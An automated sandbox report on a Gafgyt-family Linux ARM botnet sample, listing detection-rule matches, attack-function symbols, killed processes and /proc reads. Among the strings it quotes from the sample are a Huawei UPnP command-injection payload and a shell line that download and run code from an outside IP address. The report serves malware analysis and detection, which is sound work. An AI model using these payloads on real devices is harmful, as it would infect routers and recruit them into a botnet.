          Source: 6217.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6206, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6206, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6208, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6208, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6209, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6209, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6210, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6210, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6213, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6217, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6219, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6219, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6224, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6224, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6225, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: mods.arm7.elf PID: 6225, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
          Source: ELF static info symbol of initial sampleName: attack.c
          Source: ELF static info symbol of initial sampleName: attack_get_opt_int
          Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
          Source: ELF static info symbol of initial sampleName: attack_get_opt_str
          Source: ELF static info symbol of initial sampleName: attack_init
          Source: ELF static info symbol of initial sampleName: attack_method.c
          Source: ELF static info symbol of initial sampleName: attack_method_asyn
          Source: ELF static info symbol of initial sampleName: attack_method_greeth
          Source: ELF static info symbol of initial sampleName: attack_method_greip
          Source: ELF static info symbol of initial sampleName: attack_method_ice
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 720, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 759, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 788, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 800, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 847, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 884, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 936, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 1334, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 1335, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 1872, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2096, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2097, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2102, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2180, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2208, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2275, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2281, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2285, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2289, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2294, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 6210, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 6213, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 720, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 759, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 788, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 800, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 847, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 884, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 936, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 1334, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 1335, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 1860, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 1872, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 6208, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 6217, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 6219, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 6225, result: successfulJump to behavior
          Source: mods.arm7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: mods.arm7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 6219.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6219.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 6210.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6210.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 6224.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6224.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 6208.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6208.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 6225.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6225.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 6206.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6206.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 6209.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6209.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 6213.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6213.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: 6217.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6217.1.00007f803c017000.00007f803c030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6206, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6206, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6208, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6208, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6209, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6209, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6210, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6210, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6213, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6217, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6219, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6219, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6224, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6224, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6225, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: mods.arm7.elf PID: 6225, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 720, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 759, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 788, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 800, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 847, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 884, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 936, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 1334, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 1335, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 1872, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2096, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2097, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2102, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2180, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2208, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2275, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2281, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2285, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2289, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 2294, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 6210, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6208)SIGKILL sent: pid: 6213, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 720, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 759, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 788, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 800, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 847, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 884, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 936, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 1334, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 1335, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 1860, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 1872, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 6208, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 6217, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 6219, result: successfulJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)SIGKILL sent: pid: 6225, result: successfulJump to behavior
          Source: mods.arm7.elfELF static info symbol of initial sample: __gnu_unwind_execute
          Source: mods.arm7.elfELF static info symbol of initial sample: huawei_scanner_pid
          Source: mods.arm7.elfELF static info symbol of initial sample: huawei_scanner_rawpkt
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.5 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
          Source: classification engineClassification label: mal84.spre.troj.linELF@0/0@0/0
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/1582/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/2033/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/2275/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/3088/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/1612/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/1579/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/1699/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/1335/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/1698/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/2028/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/1334/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/1576/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/2302/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/3236/exeJump to behavior
          Source: /tmp/mods.arm7.elf (PID: 6222)File opened: /proc/2025/exeJump to behavior
